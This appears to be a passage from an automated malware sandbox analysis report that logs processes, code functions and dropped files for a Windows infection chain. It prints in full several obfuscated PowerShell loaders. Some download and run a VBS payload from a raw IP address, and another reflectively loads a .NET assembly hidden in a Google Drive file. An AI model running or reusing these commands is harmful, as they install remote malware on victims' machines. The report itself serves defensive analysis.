iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_029D9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_029D9247
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E75662 push eax; iretd 3_2_04E75699
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_0040134A pushfd ; retf 13_2_00401353
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004012F2 pushfd ; retf 13_2_004012F3
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_3_057A9711 push eax; ret 19_3_057A971D
              Source: C:\Windows\explorer.exeCode function: 20_2_00FDA055 push es; iretd 20_2_00FDA05D
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD14D4 push esi; ret 20_2_00FD14D6
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD47A7 push esp; iretd 20_2_00FD47A8
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD1405 push esi; ret 20_2_00FD1407
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0320967E push ds; retf 21_2_03209680
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_032094E6 push edx; ret 21_2_032094E7
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_032038A7 push esp; iretd 21_2_032038A8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C287CE push es; ret 22_2_02C28A18
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C28EEF push edi; ret 22_2_02C28EF0
              Source: C:\Windows\explorer.exeCode function: 23_2_00A014D4 push esi; ret 23_2_00A014D6
              Source: C:\Windows\explorer.exeCode function: 23_2_00A01405 push esi; ret 23_2_00A01407
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A23417 push esp; iretd 24_2_02A23418
              Source: C:\Windows\explorer.exeCode function: 28_2_00141405 push esi; ret 28_2_00141407
              Source: C:\Windows\explorer.exeCode function: 28_2_001445A7 push esp; iretd 28_2_001445A8
              Source: C:\Windows\explorer.exeCode function: 28_2_001414D4 push esi; ret 28_2_001414D6
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_00153627 push esp; iretd 30_2_00153628
              Source: C:\Windows\explorer.exeCode function: 31_2_00AC1405 push esi; ret 31_2_00AC1407
              Source: C:\Windows\explorer.exeCode function: 31_2_00AC4817 push esp; iretd 31_2_00AC4818
              Source: C:\Windows\explorer.exeCode function: 31_2_00AC14D4 push esi; ret 31_2_00AC14D6
              Source: C:\Windows\explorer.exeCode function: 31_2_00ACAC8D push esp; iretd 31_2_00ACAC95
              Source: C:\Windows\explorer.exeCode function: 31_2_00ACAAD2 push ebp; iretd 31_2_00ACAAD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dllJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wihaduvJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wihaduvJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wihaduv:Zone.Identifier read attributes | delete
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C23862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_02C23862
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
